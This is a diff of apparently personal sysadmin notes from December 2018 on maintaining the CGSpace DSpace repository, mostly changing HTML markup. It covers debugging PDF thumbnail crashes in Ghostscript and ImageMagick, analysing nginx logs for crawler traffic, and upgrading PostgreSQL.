<pre><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=pngalpha -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
DEBUG: FC_WEIGHT didn't match
<pre tabindex="0"><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=pngalpha -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
DEBUG: FC_WEIGHT didn&#39;t match
zsh: segmentation fault (core dumped) gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000
</code></pre><ul>
<li>When I replace the <code>pngalpha</code> device with <code>png16m</code> as suggested in the StackOverflow comments it works:</li>
</ul>
<pre><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=png16m -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
DEBUG: FC_WEIGHT didn't match
<pre tabindex="0"><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=png16m -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Food\ safety\ Kenya\ fruits.pdf
DEBUG: FC_WEIGHT didn&#39;t match
</code></pre><ul>
<li>Start proofing the latest round of 226 IITA archive records that Bosede sent last week and Sisay uploaded to DSpace Test this weekend (<a href="https://dspacetest.cgiar.org/handle/10568/108298">IITA_Dec_1_1997 aka Daniel1807</a>)
<ul>
@ -182,7 +182,7 @@ DEBUG: FC_WEIGHT didn't match
</li>
<li>Expand my &ldquo;encoding error&rdquo; detection GREL to include <code>~</code> as I saw a lot of that in some copy pasted French text recently:</li>
</ul>
<pre><code>or(
<pre tabindex="0"><code>or(
isNotNull(value.match(/.*\uFFFD.*/)),
isNotNull(value.match(/.*\u00A0.*/)),
isNotNull(value.match(/.*\u200A.*/)),
@ -196,48 +196,48 @@ DEBUG: FC_WEIGHT didn't match
<li>I can successfully generate a thumbnail for another recent item (<a href="https://hdl.handle.net/10568/98394">10568/98394</a>), but not for <a href="https://hdl.handle.net/10568/98390">10568/98930</a></li>
<li>Even manually on my Arch Linux desktop with ghostscript 9.26-1 and the <code>pngalpha</code> device, I can generate a thumbnail for the first one (10568/98394):</li>
</ul>
<pre><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=pngalpha -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf
<pre tabindex="0"><code>$ gs -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 -sDEVICE=pngalpha -dTextAlphaBits=4 -dGraphicsAlphaBits=4 -r72x72 -dFirstPage=1 -dLastPage=1 -sOutputFile=/tmp/out%d -f/home/aorth/Desktop/Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf
</code></pre><ul>
<li>So it seems to be something about the PDFs themselves, perhaps related to alpha support?</li>
<li>The first item (10568/98394) has the following information:</li>
</ul>
<pre><code>$ identify Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf\[0\]
<pre tabindex="0"><code>$ identify Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf\[0\]
Info Note Mainstreaming gender and social differentiation into CCAFS research activities in West Africa-converted.pdf[0]=&gt;Info Note Mainstreaming gender and social differentiation into CCAFS research activities in West Africa-converted.pdf PDF 595x841 595x841+0+0 16-bit sRGB 107443B 0.000u 0:00.000
identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1746.
identify: CorruptImageProfile `xmp&#39; @ warning/profile.c/SetImageProfileInternal/1746.
</code></pre><ul>
<li>And wow, I can&rsquo;t even run ImageMagick&rsquo;s <code>identify</code> on the first page of the second item (10568/98930):</li>
</ul>
<pre><code>$ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
<pre tabindex="0"><code>$ identify Food\ safety\ Kenya\ fruits.pdf\[0\]
zsh: abort (core dumped) identify Food\ safety\ Kenya\ fruits.pdf\[0\]
</code></pre><ul>
<li>But with GraphicsMagick&rsquo;s <code>identify</code> it works:</li>
</ul>
<pre><code>$ gm identify Food\ safety\ Kenya\ fruits.pdf\[0\]
DEBUG: FC_WEIGHT didn't match
<pre tabindex="0"><code>$ gm identify Food\ safety\ Kenya\ fruits.pdf\[0\]
DEBUG: FC_WEIGHT didn&#39;t match
Food safety Kenya fruits.pdf PDF 612x792+0+0 DirectClass 8-bit 1.4Mi 0.000u 0m:0.000002s
</code></pre><ul>
<li>Interesting that ImageMagick&rsquo;s <code>identify</code> <em>does</em> work if you do not specify a page, perhaps as <a href="https://bugs.ghostscript.com/show_bug.cgi?id=699815">alluded to in the recent Ghostscript bug report</a>:</li>
</ul>
<pre><code>$ identify Food\ safety\ Kenya\ fruits.pdf
<pre tabindex="0"><code>$ identify Food\ safety\ Kenya\ fruits.pdf
Food safety Kenya fruits.pdf[0] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
Food safety Kenya fruits.pdf[1] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
Food safety Kenya fruits.pdf[2] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
Food safety Kenya fruits.pdf[3] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
Food safety Kenya fruits.pdf[4] PDF 612x792 612x792+0+0 16-bit sRGB 64626B 0.010u 0:00.009
identify: CorruptImageProfile `xmp' @ warning/profile.c/SetImageProfileInternal/1746.
identify: CorruptImageProfile `xmp&#39; @ warning/profile.c/SetImageProfileInternal/1746.
</code></pre><ul>
<li>As I expected, ImageMagick cannot generate a thumbnail, but GraphicsMagick can (though it looks like crap):</li>
</ul>
<pre><code>$ convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten Food\ safety\ Kenya\ fruits.pdf.jpg
<pre tabindex="0"><code>$ convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten Food\ safety\ Kenya\ fruits.pdf.jpg
zsh: abort (core dumped) convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten
$ gm convert Food\ safety\ Kenya\ fruits.pdf\[0\] -thumbnail 600x600 -flatten Food\ safety\ Kenya\ fruits.pdf.jpg
DEBUG: FC_WEIGHT didn't match
DEBUG: FC_WEIGHT didn&#39;t match
</code></pre><ul>
<li>I inspected the troublesome PDF using <a href="http://jhove.openpreservation.org/">jhove</a> and noticed that it is using <code>ISO PDF/A-1, Level B</code> and the other one doesn&rsquo;t list a profile, though I don&rsquo;t think this is relevant</li>
<li>I found another item that fails when generating a thumbnail (<a href="https://hdl.handle.net/10568/98391">10568/98391</a>, DSpace complains:</li>
</ul>
<pre><code>org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&quot; &quot;-f/tmp/magick-14296Q0rJjfCeIj3w&quot; &quot;-f/tmp/magick-14296k_K6MWqwvpDm&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&quot; &quot;-f/tmp/magick-14296Q0rJjfCeIj3w&quot; &quot;-f/tmp/magick-14296k_K6MWqwvpDm&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
<pre tabindex="0"><code>org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
at org.im4java.core.Info.getBaseInfo(Info.java:360)
at org.im4java.core.Info.&lt;init&gt;(Info.java:151)
at org.dspace.app.mediafilter.ImageMagickThumbnailFilter.getImageFile(ImageMagickThumbnailFilter.java:142)
@ -253,11 +253,11 @@ org.im4java.core.InfoException: org.im4java.core.CommandException: org.im4java.c
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:226)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:78)
Caused by: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&quot; &quot;-f/tmp/magick-14296Q0rJjfCeIj3w&quot; &quot;-f/tmp/magick-14296k_K6MWqwvpDm&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
Caused by: org.im4java.core.CommandException: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
at org.im4java.core.ImageCommand.run(ImageCommand.java:219)
at org.im4java.core.Info.getBaseInfo(Info.java:342)
... 14 more
Caused by: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&quot;gs&quot; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &quot;-sDEVICE=pngalpha&quot; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &quot;-r72x72&quot; -dFirstPage=1 -dLastPage=1 &quot;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&quot; &quot;-f/tmp/magick-14296Q0rJjfCeIj3w&quot; &quot;-f/tmp/magick-14296k_K6MWqwvpDm&quot;' (-1) @ error/delegate.c/ExternalDelegateCommand/461.
Caused by: org.im4java.core.CommandException: identify: FailedToExecuteCommand `&#34;gs&#34; -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 &#34;-sDEVICE=pngalpha&#34; -dTextAlphaBits=4 -dGraphicsAlphaBits=4 &#34;-r72x72&#34; -dFirstPage=1 -dLastPage=1 &#34;-sOutputFile=/tmp/magick-142966vQs5Di64ntH%d&#34; &#34;-f/tmp/magick-14296Q0rJjfCeIj3w&#34; &#34;-f/tmp/magick-14296k_K6MWqwvpDm&#34;&#39; (-1) @ error/delegate.c/ExternalDelegateCommand/461.
at org.im4java.core.ImageCommand.finished(ImageCommand.java:253)
at org.im4java.process.ProcessStarter.run(ProcessStarter.java:314)
at org.im4java.core.ImageCommand.run(ImageCommand.java:215)
@ -265,31 +265,31 @@ Caused by: org.im4java.core.CommandException: identify: FailedToExecuteCommand `
</code></pre><ul>
<li>And on my Arch Linux environment ImageMagick&rsquo;s <code>convert</code> also segfaults:</li>
</ul>
<pre><code>$ convert bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf\[0\] -thumbnail x600 -flatten bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf.jpg
<pre tabindex="0"><code>$ convert bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf\[0\] -thumbnail x600 -flatten bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf.jpg
zsh: abort (core dumped) convert bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf\[0\] x60
</code></pre><ul>
<li>But GraphicsMagick&rsquo;s <code>convert</code> works:</li>
</ul>
<pre><code>$ gm convert bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf\[0\] -thumbnail x600 -flatten bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf.jpg
<pre tabindex="0"><code>$ gm convert bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf\[0\] -thumbnail x600 -flatten bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf.jpg
</code></pre><ul>
<li>So far the only thing that stands out is that the two files that don&rsquo;t work were created with Microsoft Office 2016:</li>
</ul>
<pre><code>$ pdfinfo bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf | grep -E '^(Creator|Producer)'
<pre tabindex="0"><code>$ pdfinfo bnfb_biofortification\ Module_Participants\ Guide\ 2018.pdf | grep -E &#39;^(Creator|Producer)&#39;
Creator: Microsoft® Word 2016
Producer: Microsoft® Word 2016
$ pdfinfo Food\ safety\ Kenya\ fruits.pdf | grep -E '^(Creator|Producer)'
$ pdfinfo Food\ safety\ Kenya\ fruits.pdf | grep -E &#39;^(Creator|Producer)&#39;
Creator: Microsoft® Word 2016
Producer: Microsoft® Word 2016
</code></pre><ul>
<li>And the one that works was created with Office 365:</li>
</ul>
<pre><code>$ pdfinfo Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf | grep -E '^(Creator|Producer)'
<pre tabindex="0"><code>$ pdfinfo Info\ Note\ Mainstreaming\ gender\ and\ social\ differentiation\ into\ CCAFS\ research\ activities\ in\ West\ Africa-converted.pdf | grep -E &#39;^(Creator|Producer)&#39;
Creator: Microsoft® Word for Office 365
Producer: Microsoft® Word for Office 365
</code></pre><ul>
<li>I remembered an old technique I was using to generate thumbnails in 2015 using Inkscape followed by ImageMagick or GraphicsMagick:</li>
</ul>
<pre><code>$ inkscape Food\ safety\ Kenya\ fruits.pdf -z --export-dpi=72 --export-area-drawing --export-png='cover.png'
<pre tabindex="0"><code>$ inkscape Food\ safety\ Kenya\ fruits.pdf -z --export-dpi=72 --export-area-drawing --export-png=&#39;cover.png&#39;
$ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
</code></pre><ul>
<li>I&rsquo;ve tried a few times this week to register for the <a href="https://www.evisa.gov.et/">Ethiopian eVisa website</a>, but it is never successful</li>
@ -304,7 +304,7 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
</ul>
</li>
</ul>
<pre><code>2018-12-03 15:44:00,030 WARN org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-datatables not found
<pre tabindex="0"><code>2018-12-03 15:44:00,030 WARN org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-datatables not found
2018-12-03 15:44:03,390 ERROR com.atmire.app.webui.servlet.ExportServlet @ Error converter plugin not found: interface org.infoCon.ConverterPlugin
...
2018-12-03 15:45:01,667 WARN org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-listing-and-reports not found
@ -312,7 +312,7 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
<li>I tested it on my local environment with Tomcat 8.5.34 and the JSPUI application still has an error (again, the logs show something about tag cloud, so be unrelated), and the Listings and Reports still asks you to log in again, despite already being logged in in XMLUI, but does appear to work (I generated a report and exported a PDF)</li>
<li>I think the errors about missing Atmire components must be important, here on my local machine as well (though not the one about atmire-listings-and-reports):</li>
</ul>
<pre><code>2018-12-03 16:44:00,009 WARN org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-datatables not found
<pre tabindex="0"><code>2018-12-03 16:44:00,009 WARN org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-datatables not found
</code></pre><ul>
<li>This has got to be part Ubuntu Tomcat packaging, and part DSpace 5.x Tomcat 8.5 readiness&hellip;?</li>
</ul>
@ -320,7 +320,7 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
<ul>
<li>Last night Linode sent a message that the load on CGSpace (linode18) was too high, here&rsquo;s a list of the top users at the time and throughout the day:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Dec/2018:1(5|6|7|8)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Dec/2018:1(5|6|7|8)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
225 40.77.167.142
226 66.249.64.63
232 46.101.86.248
@ -331,7 +331,7 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
962 66.249.70.27
1193 35.237.175.180
1450 2a01:4f8:140:3192::2
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Dec/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1141 207.46.13.57
1299 197.210.168.174
1341 54.70.40.11
@ -345,32 +345,32 @@ $ gm convert -resize x600 -flatten -quality 85 cover.png cover.jpg
</code></pre><ul>
<li><code>35.237.175.180</code> is known to us (CCAFS?), and I&rsquo;ve already added it to the list of bot IPs in nginx, which appears to be working:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180&#39; dspace.log.2018-12-03
4772
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180' dspace.log.2018-12-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=35.237.175.180&#39; dspace.log.2018-12-03 | sort | uniq | wc -l
630
</code></pre><ul>
<li>I haven&rsquo;t seen <code>2a01:4f8:140:3192::2</code> before. Its user agent is some new bot:</li>
</ul>
<pre><code>Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)
<pre tabindex="0"><code>Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)
</code></pre><ul>
<li>At least it seems the Tomcat Crawler Session Manager Valve is working to re-use the common bot XMLUI sessions:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2018-12-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2&#39; dspace.log.2018-12-03
5111
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2' dspace.log.2018-12-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=2a01:4f8:140:3192::2&#39; dspace.log.2018-12-03 | sort | uniq | wc -l
419
</code></pre><ul>
<li><code>78.46.79.71</code> is another host on Hetzner with the following user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:62.0) Gecko/20100101 Firefox/62.0
</code></pre><ul>
<li>This is not the first time a host on Hetzner has used a &ldquo;normal&rdquo; user agent to make thousands of requests</li>
<li>At least it is re-using its Tomcat sessions somehow:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71&#39; dspace.log.2018-12-03
2044
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71&#39; dspace.log.2018-12-03 | sort | uniq | wc -l
1
</code></pre><ul>
<li>In other news, it&rsquo;s good to see my re-work of the database connectivity in the <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> actually caused a reduction of persistent database connections (from 1 to 0, but still!):</li>
@ -385,7 +385,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
<li>Linode sent a message that the CPU usage of CGSpace (linode18) is too high last night</li>
<li>I looked in the logs and there&rsquo;s nothing particular going on:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;05/Dec/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;05/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1225 157.55.39.177
1240 207.46.13.12
1261 207.46.13.101
@ -399,13 +399,13 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=78.46.79.71' dspace.log.2018-12-03
</code></pre><ul>
<li><code>54.70.40.11</code> is some new bot with the following user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (compatible) SemanticScholarBot (+https://www.semanticscholar.org/crawler)
<pre tabindex="0"><code>Mozilla/5.0 (compatible) SemanticScholarBot (+https://www.semanticscholar.org/crawler)
</code></pre><ul>
<li>But Tomcat is forcing them to re-use their Tomcat sessions with the Crawler Session Manager valve:</li>
</ul>
<pre><code>$ grep -c -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
<pre tabindex="0"><code>$ grep -c -E &#39;session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11&#39; dspace.log.2018-12-05
6980
$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05 | sort | uniq | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11&#39; dspace.log.2018-12-05 | sort | uniq | wc -l
1156
</code></pre><ul>
<li><code>2a01:7e00::f03c:91ff:fe0a:d645</code> appears to be the CKM dev server where Danny is testing harvesting via Drupal</li>
@ -446,7 +446,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
<li>Linode alerted me twice today that the load on CGSpace (linode18) was very high</li>
<li>Looking at the nginx logs I see a few new IPs in the top 10:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;17/Dec/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;17/Dec/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
927 157.55.39.81
975 54.70.40.11
2090 50.116.102.77
@ -460,7 +460,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
</code></pre><ul>
<li><code>94.71.244.172</code> and <code>143.233.227.216</code> are both in Greece and use the following user agent:</li>
</ul>
<pre><code>Mozilla/3.0 (compatible; Indy Library)
<pre tabindex="0"><code>Mozilla/3.0 (compatible; Indy Library)
</code></pre><ul>
<li>I see that I added this bot to the Tomcat Crawler Session Manager valve in 2017-12 so its XMLUI sessions are getting re-used</li>
<li><code>2a01:4f8:173:1e85::2</code> is some new bot called <code>BLEXBot/1.0</code> which should be matching the existing &ldquo;bot&rdquo; pattern in the Tomcat Crawler Session Manager regex</li>
@ -477,7 +477,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=54.70.40.11' dspace.log.2018-12-05
<ul>
<li>Testing compression of PostgreSQL backups with xz and gzip:</li>
</ul>
<pre><code>$ time xz -c cgspace_2018-12-19.backup &gt; cgspace_2018-12-19.backup.xz
<pre tabindex="0"><code>$ time xz -c cgspace_2018-12-19.backup &gt; cgspace_2018-12-19.backup.xz
xz -c cgspace_2018-12-19.backup &gt; cgspace_2018-12-19.backup.xz 48.29s user 0.19s system 99% cpu 48.579 total
$ time gzip -c cgspace_2018-12-19.backup &gt; cgspace_2018-12-19.backup.gz
gzip -c cgspace_2018-12-19.backup &gt; cgspace_2018-12-19.backup.gz 2.78s user 0.09s system 99% cpu 2.899 total
@ -492,7 +492,7 @@ $ ls -lh cgspace_2018-12-19.backup*
<li>Peter asked if we could create a controlled vocabulary for publishers (<code>dc.publisher</code>)</li>
<li>I see we have about 3500 distinct publishers:</li>
</ul>
<pre><code># SELECT COUNT(DISTINCT(text_value)) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=39;
<pre tabindex="0"><code># SELECT COUNT(DISTINCT(text_value)) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=39;
count
-------
3522
@ -501,17 +501,17 @@ $ ls -lh cgspace_2018-12-19.backup*
<li>I reverted the metadata changes related to &ldquo;Unrestricted Access&rdquo; and &ldquo;Restricted Access&rdquo; on DSpace Test because we&rsquo;re not pushing forward with the new status terms for now</li>
<li>Purge remaining Oracle Java 8 stuff from CGSpace (linode18) since we migrated to OpenJDK a few months ago:</li>
</ul>
<pre><code># dpkg -P oracle-java8-installer oracle-java8-set-default
<pre tabindex="0"><code># dpkg -P oracle-java8-installer oracle-java8-set-default
</code></pre><ul>
<li>Update usage rights on CGSpace as we agreed with Maria Garruccio and Peter last month:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2018-11-27-update-rights.csv -f dc.rights -t correct -m 53 -db dspace -u dspace -p 'fuu' -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-11-27-update-rights.csv -f dc.rights -t correct -m 53 -db dspace -u dspace -p &#39;fuu&#39; -d
Connected to database.
Fixed 466 occurences of: Copyrighted; Any re-use allowed
</code></pre><ul>
<li>Upgrade PostgreSQL on CGSpace (linode18) from 9.5 to 9.6:</li>
</ul>
<pre><code># apt install postgresql-9.6 postgresql-client-9.6 postgresql-contrib-9.6 postgresql-server-dev-9.6
<pre tabindex="0"><code># apt install postgresql-9.6 postgresql-client-9.6 postgresql-contrib-9.6 postgresql-server-dev-9.6
# pg_ctlcluster 9.5 main stop
